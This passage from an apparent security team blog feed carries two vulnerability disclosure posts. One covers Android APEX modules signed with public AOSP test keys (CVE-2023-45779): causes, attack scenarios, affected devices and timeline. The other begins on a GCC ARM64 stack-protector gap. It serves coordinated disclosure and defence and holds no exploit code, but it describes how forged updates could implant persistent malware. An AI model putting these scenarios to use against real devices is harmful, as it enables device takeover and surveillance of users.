brands sign APEX modules—updatable units of highly-privileged OS code—using private keys from Android’s public source repository. Anyone can forge an APEX update for such a device to gain near-total control over it. Rather than negligence by any particular manufacturer (OEM), we believe that unsafe defaults, poor documentation, and incomplete CTS coverage in the Android Open Source Project (AOSP) were the main causes of this issue.</p>

<p>Google assigned the issue <a href="https://www.cve.org/CVERecord?id=CVE-2023-45779">CVE-2023-45779</a>, and most affected OEMs have now fixed it. Any device that comes with the Play Store is no longer vulnerable if it advertises at least a 2023-12-05 Security Patch Level (SPL).</p>

<h2 id="background">Background</h2>

<p><a href="https://source.android.com/docs/core/ota/apex">APEX modules</a> allow OEMs to update certain files in an OS image without issuing a full OTA. To do so, they locate each updatable unit (e.g. Bionic or ART) in its own ext4 filesystem image inside an <code class="language-plaintext highlighter-rouge">.apex</code> ZIP file, which gets mounted under <code class="language-plaintext highlighter-rouge">/apex</code>. An initial version of each APEX is preinstalled in <code class="language-plaintext highlighter-rouge">/system/apex</code> (or <code class="language-plaintext highlighter-rouge">/vendor/apex</code>, etc) during the OS build, but those versions can be superseded by updates installed later in <code class="language-plaintext highlighter-rouge">/data/apex</code>.</p>

<p>To ensure APEX updates are trustworthy, Android checks that each one is signed with the same keys as the preinstalled version of that APEX. APEXes carry both a standard APK signature and an <a href="https://android.googlesource.com/platform/external/avb/+/main/README.md">AVB</a> signature on their interior filesystem, and both are checked in this way. So to create a valid APEX update, one must possess both the APK and AVB private keys that were used to sign that APEX when the OS was built.</p>

<p>When it comes to signatures, though, an “OS build” isn’t just one step. Android’s core build system signs every APEX, APK, and OTA image it produces with a fixed set of “test keys”, and there’s no way to change that. Test keys are public in AOSP’s source tree: for example, <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:art/build/apex/com.android.art.pem">this</a> is the test key that signs the filesystem of the <code class="language-plaintext highlighter-rouge">com.android.art</code> APEX.</p>

<p>As described <a href="https://source.android.com/docs/core/ota/sign_builds">in AOSP’s documentation</a>, the job of re-signing a build with OEM-held “release keys” falls to a Python script called <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:build/make/tools/releasetools/sign_target_files_apks.py"><code class="language-plaintext highlighter-rouge">sign_target_files_apks</code></a>, which unpacks a built image, replaces all the signatures, and repacks it. Re-signing as a separate step has several benefits, but it also introduces the risk that not every test signature will get replaced. And that’s exactly what seems to have happened for several OEMs.</p>

<h2 id="vulnerability-details">Vulnerability details</h2>

<p>We analyzed OS images of recent Android devices from 14 reputable brands (listed below) and found that seven of those devices contained at least one preinstalled APEX signed only with AOSP test keys, for which anyone can produce an update.</p>

<p>Every vulnerable device we found had one highly-privileged vulnerable APEX in common—<code class="language-plaintext highlighter-rouge">com.android.vndk</code>. This APEX holds shared libraries that <a href="https://source.android.com/docs/core/architecture/hal">HALs</a> in the <code class="language-plaintext highlighter-rouge">/vendor</code> partition link against. Thanks to the existence of Same-Process HALs, those libraries get transitively loaded into most processes on an Android system, including</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">zygote64</code>, from which System Server and every app process is forked;</li>
  <li><code class="language-plaintext highlighter-rouge">surfaceflinger</code>, through which all screen contents pass;</li>
  <li>and of course all the HALs.</li>
</ul>

<p>We demonstrated code execution in all of the above via a malicious <code class="language-plaintext highlighter-rouge">com.android.vndk.v31</code> APEX update for a vulnerable device, a Lenovo Tab M10 Plus (Gen 3, Wi-Fi) running Android 13. You can find our proof-of-concept, as well as a script to check for vulnerable APEXes, <a href="https://github.com/metaredteam/rtx-cve-2023-45779">here</a>.</p>

<p>As an aside, <code class="language-plaintext highlighter-rouge">com.android.vndk</code> is somewhat odd because there are multiple copies of it—one for each Android API level <code class="language-plaintext highlighter-rouge">/vendor</code> can target, of which there are several thanks to <a href="https://android-developers.googleblog.com/2017/05/here-comes-treble-modular-base-for.html">Project Treble</a>. Each copy has a different APEX name (e.g. <code class="language-plaintext highlighter-rouge">com.android.vndk.v33</code> for Android 13), and it’s only useful to exploit the one <code class="language-plaintext highlighter-rouge">/vendor</code> actually uses. On all the devices we tested, every copy was equally vulnerable.</p>

<h2 id="attack-scenarios">Attack scenarios</h2>

<p>Fortunately, Android tightly controls who can install APEX updates. Although APEXes look like APKs and are installed via PackageManager, the <code class="language-plaintext highlighter-rouge">INSTALL_APEX</code> flag is <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:frameworks/base/services/core/java/com/android/server/pm/PackageInstallerService.java;l=745-753">restricted</a> to packages that hold <code class="language-plaintext highlighter-rouge">android.permission.INSTALL_PACKAGES</code> or <code class="language-plaintext highlighter-rouge">android.permission.INSTALL_PACKAGE_UPDATES</code>, both of which are <code class="language-plaintext highlighter-rouge">signature|privileged</code> permissions and cannot be obtained by third-party apps. And even packages with that permission <a href="https://cs.android.com/android/_/android/platform/frameworks/base/+/e501fd8379b1849cd3ae4f7a0485c7890aa87179">must additionally</a> either</p>

<ul>
  <li>run as the <code class="language-plaintext highlighter-rouge">system</code> user</li>
  <li>run as the <code class="language-plaintext highlighter-rouge">shell</code> user</li>
  <li>be designated as “module installer” in <code class="language-plaintext highlighter-rouge">/{system,vendor,product,odm}/etc/sysconfig/</code></li>
</ul>

<p>In practice, that limits the exploitability to four attack scenarios:</p>

<ol>
  <li>A user uses <code class="language-plaintext highlighter-rouge">adb shell</code> to exploit their own device, gaining access to nearly everything a typical “root” gets them. Since access is distributed across many SELinux contexts, root-aware tools and apps won’t work unmodified. On the other hand, root detections won’t trip: to them, the malicious APEX will be indistinguishable from legitimate OS code.</li>
  <li>A malicious actor with physical access to an unlocked device uses <code class="language-plaintext highlighter-rouge">adb shell</code> to install persistent malware without the user’s knowledge and gains long-term access to all data and activity on the device. The malware will likely go undetected by on-device scanners for the same reason a root will.</li>
  <li>A malicious actor chains this exploit to one that gets them code execution in <code class="language-plaintext highlighter-rouge">com.android.vending</code> (the “modules installer” on all <a href="https://android-developers.googleblog.com/2019/05/fresher-os-with-projects-treble-and-mainline.html">Project Mainline</a> devices) or a <code class="language-plaintext highlighter-rouge">system</code> UID app to escalate their privileges and gain persistence.</li>
  <li>A malicious actor who gains access to whatever Google Play backend serves APEX updates remotely exploits devices en masse. We do not know the details of Project Mainline’s infrastructure so cannot assess how feasible this is. For example, it becomes far more plausible if OEMs are allowed to upload APEX updates to Google Play than if only Google is, as there are more credentials for an attacker to compromise. In that case, depending on the specifics of update targeting, a malicious OEM could potentially even exploit other OEMs’ devices.</li>
</ol>

<h2 id="root-cause">Root cause</h2>

<p>Why did so many OEMs make the exact same mistake? Recall that AOSP comes with <a href="https://source.android.com/docs/core/ota/sign_builds">instructions</a> to re-sign a build, <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:build/make/tools/releasetools/sign_target_files_apks.py">a script</a> to perform that re-signing, and—as a last line of defense—its extensive <a href="https://source.android.com/docs/compatibility/cts">Compatibility Test Suite</a>, which enforces various compatibility and security guarantees. Shouldn’t one of those have warned OEMs of vulnerable APEXes?</p>

<p>In answering that question, we uncovered a number of deficiencies in AOSP that, together, make it far easier to create a vulnerable build than a secure one.</p>

<h3 id="incomplete-cts-coverage">Incomplete CTS coverage</h3>

<p>Most critically, we found that several APEXes are not checked by CTS at all. Two CTS tests look for test keys: <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:cts/tests/tests/security/src/android/security/cts/PackageSignatureTest.java;l=81-109">PackageSignatureTest</a> checks both APKs and APEXes for insecure APK signatures, while <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:cts/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java">ApexSignatureVerificationTest</a> checks APEXes for insecure AVB signatures. But both tests hardcode lists of test keys, which over time have diverged from those actually in use. As a result, several vulnerable APEXes are not caught by either test.</p>

<p>The nature of APEXes makes such divergence inevitable: unlike APKs, which share <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:build/make/target/product/security/">just a few test keys</a>, APEXes all have different test keys, meaning each new APEX is a new opportunity for divergence. In our view, the only fix is for CTS to check signatures against the source of truth—the build system. In fact, the build system already records which test keys it uses to a file called <code class="language-plaintext highlighter-rouge">apexkeys.txt</code>, which plays a part in…</p>

<h3 id="unsafe-defaults">Unsafe defaults</h3>

<p><a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:build/make/tools/releasetools/sign_target_files_apks.py"><code class="language-plaintext highlighter-rouge">sign_target_files_apks</code></a>, which re-signs a build, doesn’t guarantee replacement of every test signature. On the contrary, it doesn’t replace any test signatures by default! Run without arguments, it signs each APEX and APK using the very same test keys the build system did, which it finds by parsing <code class="language-plaintext highlighter-rouge">apexkeys.txt</code> and <code class="language-plaintext highlighter-rouge">apkcerts.txt</code> respectively. We assume this default was intended as a starting state for arguments like <code class="language-plaintext highlighter-rouge">--key_mapping</code>, but we’re unsure why the absence of such arguments doesn’t result in at least a warning.</p>

<p>Here too, a risk that was low for APKs—forgetting to specify a test key’s replacement—became a near certainty once APEXes appeared. Because each APEX has its own test keys, each must be mapped to a release key individually. And although enumerating every APEX in Android is clearly error-prone—especially as new Android versions regularly add and remove APEXes—that’s exactly what AOSP’s documentation <a href="https://source.android.com/docs/core/ota/sign_builds#apex-signing-key-replacement">instructs</a> OEMs to do. And speaking of that documentation…</p>

<h3 id="poor-documentation">Poor documentation</h3>

<p>AOSP’s “<a href="https://source.android.com/docs/core/ota/sign_builds">Sign builds for release</a>” article begins by declaring that Android uses signatures in “two places”, APKs and OTA updates. There is no mention of APEX signatures in the introduction, nor anywhere prior to a section titled “Advanced signing options”, which gives the guidance above.</p>

<p>Furthermore, neither the names nor the locations of APEX test keys themselves (e.g. <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:art/build/apex/com.android.art.pem">this one</a>) make it clear that they’re test keys. In contrast, APK test keys all live in <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:build/make/target/product/security/">a single directory</a> alongside a notice that they should “NEVER be used to sign packages in publicly released images”.</p>

<p>Without documentation to the contrary, an OEM might believe that APEX re-signing is optional or unimportant until CTS failures arise. They then might address those failures and think nothing more of the matter, confident that CTS and <code class="language-plaintext highlighter-rouge">sign_target_files_apks</code> know what needs signing. And who could fault them for that?</p>

<h3 id="other-factors">Other factors</h3>

<p>Although far less important than the three issues above, these two details may have also misled OEMs:</p>

<ol>
  <li>In <code class="language-plaintext highlighter-rouge">Android.bp</code> files, some APEXes, including <code class="language-plaintext highlighter-rouge">com.android.vndk</code>, are marked <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:packages/modules/vndk/apex/Android.bp;l=25"><code class="language-plaintext highlighter-rouge">updatable: false</code></a>. That might lead OEMs to believe that such APEXes cannot be updated and so don’t need secure keys, but in fact all it means is that the build system will not “enforce additional rules for making sure that the APEX is truly updatable”.</li>
  <li><code class="language-plaintext highlighter-rouge">com.android.vndk</code> is not in Google’s <a href="https://source.android.com/docs/core/ota/modular-system">documented list of APEXes</a>. Additionally, the <a href="https://cs.android.com/android/platform/superproject/+/android-14.0.0_r18:packages/modules/vndk/apex/com.android.vndk.pubkey">AVB test key files</a> for <code class="language-plaintext highlighter-rouge">com.android.vndk</code> end in <code class="language-plaintext highlighter-rouge">.pubkey</code> rather than the more common <code class="language-plaintext highlighter-rouge">.avbpubkey</code>, which could cause naive enumeration strategies to miss them.</li>
</ol>

<h2 id="response">Response</h2>

<p>We reported our findings privately to Google on September 19th, 2023. Google acknowledged our report immediately, and the Android Security Team confirmed it as valid within a week. On September 25th, Google issued Partner Security Advisory 2023-11, advising its OEM partners of the issue and how to fix it. Around the same time, Google individually contacted each affected OEM we identified.</p>

<p>To ensure that OEMs re-signed vulnerable APEXes, Google added a test to their proprietary Build Test Suite (BTS), through which all updates to <a href="https://www.android.com/certified/partners/">Play Protect certified</a> devices pass, that warned of vulnerable APEXes starting November 1st and rejected them starting December 4th for updates claiming a <a href="https://source.android.com/docs/security/bulletin/2023-12-01">December 2023 patch level</a> or higher.</p>

<p>Google has also fixed the deficiencies we identified in CTS. We have not seen those fixes, which won’t be made public until the release of Android V. Nonetheless, we believe the vast majority of real-world risk is now gone: OEMs have had ample time to patch their devices since Google’s initial advisory, and a spot check we performed on January 25th revealed that most have done so.</p>

<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-45779">CVE-2023-45779</a> was made public by Google on December 4th but contained no details. This post and <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-wmcc-g67r-9962">our accompanying disclosure</a> are the first public descriptions of the issue. Google plans to update the CVE with more detail after we publish this post.</p>

<h2 id="tested-devices">Tested devices</h2>

<h3 id="entry-format">Entry format</h3>

<ul>
  <li><strong>Device name</strong><br />
<code class="language-plaintext highlighter-rouge">ro.build.fingerprint</code><br />
Where we obtained the OS image<br />
Vulnerable APEXes, if any</li>
</ul>

<h3 id="vulnerable">Vulnerable</h3>

<p><em>NOTE: On every device we checked, either all versions of the VNDK APEX were vulnerable or none of them were. For brevity, we’ve only listed the VNDK version that’s actually used by each vulnerable device.</em></p>

<ul>
  <li><strong>Asus Zenfone 9</strong><br />
<code class="language-plaintext highlighter-rouge">asus/WW_AI2202/ASUS_AI2202:13/TKQ1.220807.001/33.0804.2060.142:user/release-keys</code><br />
<a href="https://www.asus.com/mobile-handhelds/phones/zenfone/zenfone-9/helpdesk_bios/?model2Name=Zenfone-9">Official ASUS OTA ZIP</a><br />
com.android.vndk.v32, com.android.uwb, com.android.wifi</li>
  <li><strong>vivo X90 Pro</strong><br />
<code class="language-plaintext highlighter-rouge">vivo/V2219/V2219:14/UP1A.230620.001/compiler07281738:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/vivo/v2219">dumps.tadiphone.dev, vivo/v2219</a><br />
com.android.vndk.v33, com.android.rkpd, com.android.uwb, com.android.virt, com.android.wifi</li>
  <li><strong>Nokia G50</strong><br />
<code class="language-plaintext highlighter-rouge">Nokia/Punisher_00WW/PHR_sprout:13/TKQ1.220807.001/00WW_3_320:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/nokia/phr_sprout">dumps.tadiphone.dev, nokia/phr_sprout</a><br />
com.android.vndk.v30</li>
  <li><strong>Microsoft Surface Duo 2</strong><br />
<code class="language-plaintext highlighter-rouge">surface/duo2/duo2:12/2023.429.67/202304290067:user/release-keys</code><br />
<a href="https://support.microsoft.com/en-us/surface-recovery-image">Official Microsoft OTA ZIP</a><br />
com.android.vndk.v30, com.android.appsearch, com.android.wifi</li>
  <li><strong>Lenovo Tab M10 Plus (Gen 3, Wi-Fi)</strong><br />
<code class="language-plaintext highlighter-rouge">Lenovo/TB125FU/TB125FU:13/TP1A.220624.014/S100078_230713_ROW:user/release-keys</code><br />
Physical device<br />
com.android.vndk.v31, com.android.uwb, com.android.wifi</li>
  <li><strong>Nothing Phone 2</strong><br />
<code class="language-plaintext highlighter-rouge">Nothing/Pong/Pong:13/TKQ1.221220.001/2308181943:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/nothing/pong">dumps.tadiphone.dev, Nothing/Pong</a><br />
com.android.vndk.v32, com.android.uwb, com.android.wifi</li>
  <li><strong>Fairphone 5</strong><br />
<em>NOTE: Fairphone did their own investigation in response to our report and discovered that Fairphone 3, 3+, and 4 were also vulnerable. You can read their statement <a href="https://www.fairphone.com/en/2023/12/22/security-update-apex-modules-vulnerability-fixed">here</a>.</em><br />
<code class="language-plaintext highlighter-rouge">Fairphone/FP5/FP5:13/TKQ1.230127.002/TT3G:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/fairphone/fp5">dumps.tadiphone.dev, fairphone/fp5</a><br />
com.android.vndk.v30, com.android.uwb, com.android.wifi</li>
</ul>

<h3 id="not-vulnerable">Not vulnerable</h3>

<ul>
  <li><strong>Google Pixel 5</strong><br />
<code class="language-plaintext highlighter-rouge">google/redfin/redfin:13/TQ3A.230805.001.A2/10385117:user/release-keys</code><br />
Physical device</li>
  <li><strong>Samsung Galaxy S23</strong><br />
<code class="language-plaintext highlighter-rouge">samsung/dm1quew/dm1q:13/TP1A.220624.014/S911U1UEU1AWGH:user/release-keys</code><br />
Official Samsung OTA ZIP, fetched with <a href="https://github.com/martinetd/samloader">samloader</a></li>
  <li><strong>Xiaomi Redmi Note 12 4G</strong><br />
<code class="language-plaintext highlighter-rouge">Redmi/tapas_global/tapas:13/TKQ1.221114.001/V14.0.12.0.TMTMIXM:user/release-keys</code><br />
<a href="https://bigota.d.miui.com/V14.0.12.0.TMTMIXM/miui_TAPASGlobal_V14.0.12.0.TMTMIXM_7e3f673289_13.0.zip">Official Xiaomi OTA ZIP</a></li>
  <li><strong>OPPO Find X6 Pro</strong><br />
<code class="language-plaintext highlighter-rouge">OPPO/PGEM10/OP528BL1:13/TP1A.220905.001/T.10b3891-27825-556fa:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/oppo/op528bl1">dumps.tadiphone.dev, oppo/op528bl1</a></li>
  <li><strong>Sony Xperia 1 V</strong><br />
<code class="language-plaintext highlighter-rouge">Sony/pdx234/pdx234:13/TKQ1.221114.001/1:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/sony/pdx234">dumps.tadiphone.dev, sony/pdx234</a></li>
  <li><strong>moto razr 40 Ultra</strong><br />
<code class="language-plaintext highlighter-rouge">motorola/zeekr_cn/msi:13/T2TZ33M.18-35-5/dcdd5:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/motorola/zeekr">dumps.tadiphone.dev, motorola/zeekr</a></li>
  <li><strong>OnePlus 10T</strong><br />
<code class="language-plaintext highlighter-rouge">OnePlus/CPH2413/OP5552L1:13/SKQ1.221119.001/S.123ec2a_6b801_6ff30:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/oneplus/op5552l1">dumps.tadiphone.dev, oneplus/op5552l1</a></li>
</ul>

<h2 id="appendix-disclosure-timeline">Appendix: disclosure timeline</h2>

<ul>
  <li>September 6th, 2023: We notice that an Android device we use for testing has APEXes signed with test keys, which prompts us to check other devices.</li>
  <li>September 13th, 2023: We complete our survey and conclude that the issue is widespread enough that Google should coordinate the response.</li>
  <li>September 19th, 2023: We report our findings to Google, who passes them to the Android Security Team.</li>
  <li>September 25th, 2023: Google releases an Android Partner Security Advisory to their OEM partners detailing the issue. The next day, they respond to us, rating the issue High Severity.</li>
  <li>September 28th, 2023: Google informs us of the Partner Advisory and indicates they’ve contacted affected OEMs directly.</li>
  <li>October 18th, 2023: Google updates the Partner Security Advisory with details on remediation, stating that the issue will be part of the December 4th Android Security Bulletin and detailing the BTS enforcement schedule.</li>
  <li>October 26th, 2023: We ask Google if the December ASB will contain enough details to warrant simultaneous release of this post, even if most OEMs haven’t released a fix. Google replies that the bulletin text won’t contain “specific technical information” but that they do “consider [the issue] publicly disclosed” at that point.</li>
  <li>November 1st: BTS purportedly begins warning OEMs when a build has vulnerable APEXes.</li>
  <li>November 6th, 2023: We notify affected OEMs that we’ll name them in this post on December 4th, as we believe the ASB will include CTS patches indicating APEXes have been signed with test keys. We offer to publish statements from them. We receive an automated acknowledgement from Nothing, and Nokia Corporation tells us they’ve passed the email to HMD Global, who makes Nokia-branded phones but “don’t have [a] similar responsible disclosure program”.</li>
  <li>November 7th, 2023: Google updates the Partner Security Advisory to add the CVE number and a note that only “builds … claiming the 2023-12-05 SPL or higher” will be subject to BTS enforcement on December 4th.</li>
  <li>November 13th, 2023: Lenovo confirms receipt of our email and says they don’t yet have a statement.</li>
  <li>Week of November 13th: Multiple OEMs create keys to re-sign their vulnerable APEXes, as evidenced by metadata in the updates they subsequently released.</li>
  <li>November 15th, 2023: Google asks permission to share our detection tooling with OEMs who want an offline way to find vulnerable APEXes. We grant it.</li>
  <li>November 15th, 2023: We ask Google explicitly if the December ASB will include CTS patches, as our plan to disclose on December 4th relies on that assumption.</li>
  <li>November 21st, 2023: Google sends us a generic update which formally shares the CVE ID and states in part that they “will be releasing a patch for this issue in an upcoming bulletin”.</li>
  <li>November 27th, 2023: We notice that the December ASB partner preview, which Meta has access to but most researchers don’t, contains no APEX-related CTS patches. We ask Google to confirm that the ASB will expose details of the issue via a patch. Google replies that CTS patches actually won’t become public until Android V and that they support us giving OEMs more time.</li>
  <li>November 28th, 2023: Lenovo asks us if we plan to disclose on December 4th, like our notice claimed, or on December 18th (90 days from our initial report), like Google’s Partner Advisory claimed. We reply that it’ll be 4th but we’re considering postponement given the new information from Google.</li>
  <li>December 1st, 2023: Lenovo follows-up on their question. We opt to officially postpone disclosure until January 30th, 2024 and notify all OEMs of the change. At this point, no OEMs had yet released fixes to our knowledge.</li>
  <li>December 4th, 2023: The <a href="https://source.android.com/docs/security/bulletin/2023-12-01">December ASB</a> comes out. As promised, it contains no details an attacker could use to discern the issue.</li>
  <li>December 7th, 2023: Fairphone thanks us for the postponement, says they intend to provide a statement, and asks permission to credit us in their own disclosure. We accept, and a couple weeks later we exchange statements and links where our respective disclosures will appear.</li>
  <li>January 16th, 2024: Google offers us a $7,000 bounty for our report, which we ask them on January 25th to donate to charity. (Google, like Meta, doubles bounties paid to charity.)</li>
  <li>January 25th, 2024: Lenovo asks for confirmation that January 30th is still our planned disclosure date, which we give.</li>
  <li>January 30th, 2024: This post, <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-wmcc-g67r-9962">our disclosure</a>, <a href="https://github.com/metaredteam/rtx-cve-2023-45779">our PoC code</a>, and <a href="https://www.fairphone.com/en/2023/12/22/security-update-apex-modules-vulnerability-fixed">Fairphone’s post</a> all go live.</li>
</ul>]]></content><author><name>Tom Hebb, Red Team X</name></author><category term="exploitation" /><summary type="html"><![CDATA[We recently discovered that Android devices from multiple major brands sign APEX modules—updatable units of highly-privileged OS code—using private keys from Android’s public source repository. Anyone can forge an APEX update for such a device to gain near-total control over it. Rather than negligence by any particular manufacturer (OEM), we believe that unsafe defaults, poor documentation, and incomplete CTS coverage in the Android Open Source Project (AOSP) were the main causes of this issue.]]></summary></entry><entry><title type="html">CVE-2023-4039: GCC’s -fstack-protector fails to guard dynamic stack allocations on ARM64</title><link href="https://rtx.meta.security/mitigation/2023/09/12/CVE-2023-4039.html" rel="alternate" type="text/html" title="CVE-2023-4039: GCC’s -fstack-protector fails to guard dynamic stack allocations on ARM64" /><published>2023-09-12T00:00:00+00:00</published><updated>2023-09-12T00:00:00+00:00</updated><id>https://rtx.meta.security/mitigation/2023/09/12/CVE-2023-4039</id><content type="html" xml:base="https://rtx.meta.security/mitigation/2023/09/12/CVE-2023-4039.html"><![CDATA[<p>GCC’s stack smashing protection, which keeps attackers from exploiting stack buffer overflow bugs in code it compiles, has no effect when the vulnerable buffer is a variable-length array or <code class="language-plaintext highlighter-rouge">alloca()</code> allocation and the target architecture is 64-bit ARM. This issue is a mitigation weakness and is not exploitable directly. <a href="https://gcc.gnu.org/pipermail/gcc-patches/2023-September/630054.html">A fix is now available on GCC’s mailing list.</a> All versions of GCC are affected, so we recommend you incorporate that fix if you distribute GCC or ARM64 binaries compiled with GCC.</p>

<h2 id="background">Background</h2>

<p><a href="https://www.memorysafety.org/docs/memory-safety/#how-common-are-memory-safety-vulnerabilities">Memory safety bugs cause most security vulnerabilities in C and C++ programs.</a> A common and easily-exploitable type of memory safety bug is the <strong>stack buffer overflow</strong>, in which a program fails to check that an attacker-controlled length or offset is within the bounds of a local (i.e. stack-allocated) array, allowing the attacker to write to memory past the end of that array:</p>

<ol>
  <li>Stack buffer overflows are common because C makes bounds checking hard. The only way to pass an array to a function in C is to pass a pointer to the beginning of that array, which discards its length. Well-written functions take the length as a separate parameter so they can perform bounds checks, but many functions (e.g. <code class="language-plaintext highlighter-rouge">gets()</code> and <code class="language-plaintext highlighter-rouge">strcpy()</code> in libc) aren’t well-written. Even ones that are have no way to verify that the length is correct and not, say, derived from an attacker-controlled input.</li>
  <li>Stack buffer overflows are easily exploitable because they usually let an attacker control execution instead of just data. The stack, which holds local variables of each running function, also holds each function’s <strong>return address</strong>, which tells it where it was called from so it can go back there once it’s done. By changing the return address, the attacker can make the program run code of their choosing.</li>
</ol>

<p>Compiler warnings and static analysis tools help solve #1 by flagging safety bugs when code is written, but the nature of C and C++ makes both false positives and false negatives inevitable. (Safe languages like Rust fully solve #1, but it’ll be a while yet before the average person relies on no security-critical C or C++ in their daily life.)</p>

<p>As such, modern C/C++ compilers also try to solve #2 by making stack buffer overflows harder to exploit in the programs they compile. They do so using <a href="https://en.wikipedia.org/wiki/Buffer_overflow_protection">various techniques</a>, but the one we’ll discuss today is known as <strong>stack smashing protection</strong>.</p>

<p>Functions compiled with stack smashing protection place a secret, randomly-generated value known as a <strong>stack guard</strong> or <strong>stack canary</strong> in their stack frame, between their local variables and their return address. Right before they return, they check if the guard has changed and (in most runtimes) abort the program immediately if it has. The compiler automatically inserts the instructions to set and check the guard, so no source code changes are needed.</p>

<p>Such a drastic response is warranted because, if the stack guard changes, there’s a 100% chance that a buffer overflow has occurred. The reverse is not true, though: stack guards only reliably detect <strong>contiguous</strong> overflow bugs, in which an attacker controls the length of data written to a local array but not the offset. If they do control the offset, they can selectively overwrite the return address while leaving the guard and other intervening bytes unchanged. Many real-world bugs allow only contiguous overflows, though; for those, stack guards are effective.</p>

<p><a href="https://gcc.gnu.org/">GCC</a> is one of the most popular C/C++ compilers in the world. It protects against stack smashing exactly as just described when invoked with the <code class="language-plaintext highlighter-rouge">-fstack-protector</code> flag or one of its variants. AArch64 is the 64-bit version of the ARM architecture and powers most modern handheld devices.</p>

<h2 id="vulnerability-details">Vulnerability details</h2>

<p>On AArch64 targets, GCC’s stack smashing protection does not detect or defend against overflows of dynamically-sized local variables. In C, dynamically-sized variables include both <a href="https://en.wikipedia.org/wiki/Variable-length_array">variable-length arrays</a> and buffers allocated using <code class="language-plaintext highlighter-rouge">alloca()</code>. GCC’s AArch64 stack frames place such variables immediately below saved register values like the return address with no intervening stack guard. All versions of GCC that support the pertinent features are affected.</p>

<p>The reason this happens for AArch64 but not for other GCC targets is because GCC’s AArch64 backend lays out stack frames in an unconventional way: instead of saving the return address at the top of a frame (i.e. at the highest address, pushed before anything else) like most other backends and compilers, it saves it near the bottom of the frame, <em>below</em> the local variables. <a href="https://gcc.gnu.org/git/?p=gcc.git&amp;a=blob&amp;f=gcc%2Fconfig%2Faarch64%2Faarch64.cc&amp;h=44935e80565f#l9940">This comment</a> from GCC’s source documents the frame layout:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">/*</span> <span class="n">AArch64</span> <span class="n">stack</span> <span class="n">frames</span> <span class="n">generated</span> <span class="n">by</span> <span class="n">this</span> <span class="n">compiler</span> <span class="n">look</span> <span class="n">like</span><span class="o">:</span>

	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>                               <span class="o">|</span>
	<span class="o">|</span>  <span class="n">incoming</span> <span class="n">stack</span> <span class="n">arguments</span>     <span class="o">|</span>
	<span class="o">|</span>                               <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>                               <span class="o">|</span> <span class="o">&lt;--</span> <span class="n">incoming</span> <span class="n">stack</span> <span class="n">pointer</span> <span class="p">(</span><span class="n">aligned</span><span class="p">)</span>
	<span class="o">|</span>  <span class="n">callee</span><span class="o">-</span><span class="n">allocated</span> <span class="n">save</span> <span class="n">area</span>   <span class="o">|</span>
	<span class="o">|</span>  <span class="k">for</span> <span class="k">register</span> <span class="n">varargs</span>         <span class="o">|</span>
	<span class="o">|</span>                               <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>  <span class="n">local</span> <span class="n">variables</span>              <span class="o">|</span> <span class="o">&lt;--</span> <span class="n">frame_pointer_rtx</span>
	<span class="o">|</span>                               <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>  <span class="n">padding</span>                      <span class="o">|</span> \
	<span class="o">+-------------------------------+</span>  <span class="o">|</span>
	<span class="o">|</span>  <span class="n">callee</span><span class="o">-</span><span class="n">saved</span> <span class="n">registers</span>       <span class="o">|</span>  <span class="o">|</span> <span class="n">frame</span><span class="p">.</span><span class="n">saved_regs_size</span>
	<span class="o">+-------------------------------+</span>  <span class="o">|</span>
	<span class="o">|</span>  <span class="n">LR</span><span class="err">'</span>                          <span class="o">|</span>  <span class="o">|</span>
	<span class="o">+-------------------------------+</span>  <span class="o">|</span>
	<span class="o">|</span>  <span class="n">FP</span><span class="err">'</span>                          <span class="o">|</span>  <span class="o">|</span>
	<span class="o">+-------------------------------+</span>  <span class="o">|&lt;-</span> <span class="n">hard_frame_pointer_rtx</span> <span class="p">(</span><span class="n">aligned</span><span class="p">)</span>
	<span class="o">|</span>  <span class="n">SVE</span> <span class="n">vector</span> <span class="n">registers</span>         <span class="o">|</span>  <span class="o">|</span> \
	<span class="o">+-------------------------------+</span>  <span class="o">|</span>  <span class="o">|</span> <span class="n">below_hard_fp_saved_regs_size</span>
	<span class="o">|</span>  <span class="n">SVE</span> <span class="n">predicate</span> <span class="n">registers</span>      <span class="o">|</span> <span class="o">/</span>  <span class="o">/</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>  <span class="n">dynamic</span> <span class="n">allocation</span>           <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>  <span class="n">padding</span>                      <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>  <span class="n">outgoing</span> <span class="n">stack</span> <span class="n">arguments</span>     <span class="o">|</span> <span class="o">&lt;--</span> <span class="n">arg_pointer</span>
	<span class="o">|</span>                               <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
